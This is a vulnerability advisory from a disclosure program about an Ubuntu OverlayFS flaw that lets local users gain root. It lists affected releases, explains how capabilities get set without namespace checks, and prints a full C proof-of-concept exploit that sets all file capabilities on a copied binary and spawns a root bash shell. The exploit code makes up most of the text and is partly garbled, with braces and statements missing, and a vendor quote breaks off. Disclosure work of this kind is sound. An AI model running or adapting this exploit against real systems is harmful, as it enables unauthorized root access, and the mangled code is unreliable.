SSD Advisory – OverlayFS PE


Find out how a vulnerability in OverlayFS allows local users under Ubuntu to gain root privileges.

Vulnerability Summary

An Ubuntu specific issue in the overlayfs file system in the Linux kernel where it did not properly validate the application of file system capabilities with respect to user namespaces. A local attacker could use this to gain elevated privileges, due to a patch carried in Ubuntu to allow unprivileged overlayfs mounts.




An independent security researcher has reported this vulnerability to the SSD Secure Disclosure program.

Affected Versions

Ubuntu 20.10

Ubuntu 20.04 LTS

Ubuntu 18.04 LTS

Ubuntu 16.04 LTS

Ubuntu 14.04 ESM

Vendor Response

“We published security advisories for this issue today in

as well as making the issue public in our CVE tracker:

The following is the content of the message was sent to the oss-security list:

Vulnerability Analysis

Linux supports file capabilities stored in extended file attributes that work similarly to setuid-bit, but can be more fine-grained. A simplified procedure for setting file capabilities in pseudo-code looks like this:

    if cap_convert_nscap(...) is not OK:
        then fail

The important call is cap_convert_nscap, which checks permissions with respect to namespaces.

If we set the file capabilities from our own namespace and on our own mount, there is no problem and we have permission to do so. The problem is that when OverlayFS forwards this operation to the underlying file system, it only calls vfs_setxattr and skips checks in cap_convert_nscap.

This allows to set arbitrary capabilities on files in outer namespace/mount, where they will also be applied during execution.

In Linux 5.11 the call to cap_convert_nscap was moved into vfs_setxattr, so it is no more vulnerable.



#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <err.h>
#include <errno.h>
#include <sched.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <sys/mount.h>

//#include <attr/xattr.h>
//#include <sys/xattr.h>
int setxattr(const char *path, const char *name, const void *value, size_t size, int flags);

#define DIR_BASE    "./ovlcap"
#define DIR_WORK    DIR_BASE "/work"
#define DIR_LOWER   DIR_BASE "/lower"
#define DIR_UPPER   DIR_BASE "/upper"
#define DIR_MERGE   DIR_BASE "/merge"
#define BIN_MERGE   DIR_MERGE "/magic"
#define BIN_UPPER   DIR_UPPER "/magic"

static void xmkdir(const char *path, mode_t mode)
    if (mkdir(path, mode) == -1 && errno != EEXIST)
        err(1, "mkdir %s", path);

static void xwritefile(const char *path, const char *data)
    int fd = open(path, O_WRONLY);
    if (fd == -1)
        err(1, "open %s", path);
    ssize_t len = (ssize_t) strlen(data);
    if (write(fd, data, len) != len)
        err(1, "write %s", path);

static void xcopyfile(const char *src, const char *dst, mode_t mode)
    int fi, fo;

    if ((fi = open(src, O_RDONLY)) == -1)
        err(1, "open %s", src);
    if ((fo = open(dst, O_WRONLY | O_CREAT, mode)) == -1)
        err(1, "open %s", dst);

    char buf[4096];
    ssize_t rd, wr;

    for (;;) {
        rd = read(fi, buf, sizeof(buf));
        if (rd == 0) {
        } else if (rd == -1) {
            if (errno == EINTR)
            err(1, "read %s", src);

        char *p = buf;
        while (rd > 0) {
            wr = write(fo, p, rd);
            if (wr == -1) {
                if (errno == EINTR)
                err(1, "write %s", dst);
            p += wr;
            rd -= wr;


static int exploit()
    char buf[4096];

    sprintf(buf, "rm -rf '%s/'", DIR_BASE);

    xmkdir(DIR_BASE, 0777);
    xmkdir(DIR_WORK,  0777);
    xmkdir(DIR_LOWER, 0777);
    xmkdir(DIR_UPPER, 0777);
    xmkdir(DIR_MERGE, 0777);

    uid_t uid = getuid();
    gid_t gid = getgid();

    if (unshare(CLONE_NEWNS | CLONE_NEWUSER) == -1)
        err(1, "unshare");

    xwritefile("/proc/self/setgroups", "deny");

    sprintf(buf, "0 %d 1", uid);
    xwritefile("/proc/self/uid_map", buf);

    sprintf(buf, "0 %d 1", gid);
    xwritefile("/proc/self/gid_map", buf);

    sprintf(buf, "lowerdir=%s,upperdir=%s,workdir=%s", DIR_LOWER, DIR_UPPER, DIR_WORK);
    if (mount("overlay", DIR_MERGE, "overlay", 0, buf) == -1)
        err(1, "mount %s", DIR_MERGE);

    // all+ep
    char cap[] = "\x01\x00\x00\x02\xff\xff\xff\xff\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00";

    xcopyfile("/proc/self/exe", BIN_MERGE, 0777);
    if (setxattr(BIN_MERGE, "security.capability", cap, sizeof(cap) - 1, 0) == -1)
        err(1, "setxattr %s", BIN_MERGE);

    return 0;

int main(int argc, char *argv[])
    if (strstr(argv[0], "magic") || (argc > 1 && !strcmp(argv[1], "shell"))) {
        execl("/bin/bash", "/bin/bash", "--norc", "--noprofile", "-i", NULL);
        err(1, "execl /bin/bash");

    pid_t child = fork();
    if (child == -1)
        err(1, "fork");

    if (child == 0) {
    } else {
        waitpid(child, NULL, 0);

    execl(BIN_UPPER, BIN_UPPER, "shell", NULL);
    err(1, "execl %s", BIN_UPPER);

Interested in Remote Code Execution? You may be interested in these:

Looking to submit a Remote Code Execution vulnerability?

Talk to us!